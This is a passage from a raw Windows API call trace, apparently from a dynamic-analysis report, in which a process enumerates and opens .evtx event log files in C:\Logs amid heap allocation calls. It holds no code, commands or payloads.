hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0087.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0087.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.434] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.434] AreFileApisANSI () returned 1 [0087.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx", lpUsedDefaultChar=0x0) returned 50 [0087.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0087.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.434] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0087.434] AreFileApisANSI () returned 1 [0087.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0087.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46978 [0087.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x46978, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 50 [0087.434] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.435] GetFileType (hFile=0x424) returned 0x1 [0087.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46978 | out: hHeap=0x20000) returned 1 [0087.435] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.435] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.435] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.435] CloseHandle (hObject=0x424) returned 1 [0087.435] AreFileApisANSI () returned 1 [0087.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0087.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46668 [0087.435] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x46668, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 50 [0087.436] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.436] GetFileType (hFile=0x424) returned 0x1 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0087.436] CloseHandle (hObject=0x424) returned 1 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71828 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.436] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0087.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0087.437] AreFileApisANSI () returned 1 [0087.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x45e88 [0087.437] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=50 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx") returned 50 [0087.437] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Store%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-store%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd751ea61, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd751ea61, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dd3053, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0087.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.437] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.437] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cAlternateFileName="MIE2F0~1.EVT")) returned 1 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0087.437] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0087.437] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0087.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0087.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0087.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0087.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0087.438] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0087.438] AreFileApisANSI () returned 1 [0087.438] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx", lpUsedDefaultChar=0x0) returned 58 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0087.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.438] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0087.438] AreFileApisANSI () returned 1 [0087.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0087.438] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0087.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 58 [0087.439] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.439] GetFileType (hFile=0x424) returned 0x1 [0087.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0087.439] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.439] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.439] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.439] CloseHandle (hObject=0x424) returned 1 [0087.440] AreFileApisANSI () returned 1 [0087.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a630 [0087.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 58 [0087.440] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.440] GetFileType (hFile=0x424) returned 0x1 [0087.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0087.440] CloseHandle (hObject=0x424) returned 1 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0087.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0087.440] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0087.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0087.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0087.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0087.441] AreFileApisANSI () returned 1 [0087.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a430 [0087.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx") returned 58 [0087.441] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TaskScheduler%4Maintenance.evtx" (normalized: "c:\\logs\\microsoft-windows-taskscheduler%4maintenance.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd0763ff, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcd0763ff, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0087.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.441] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.441] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cAlternateFileName="MIAB1D~1.EVT")) returned 1 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ca40 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0087.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0087.441] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0087.442] InitOnceExecuteOnce (in: InitOnce=0x1086e18, 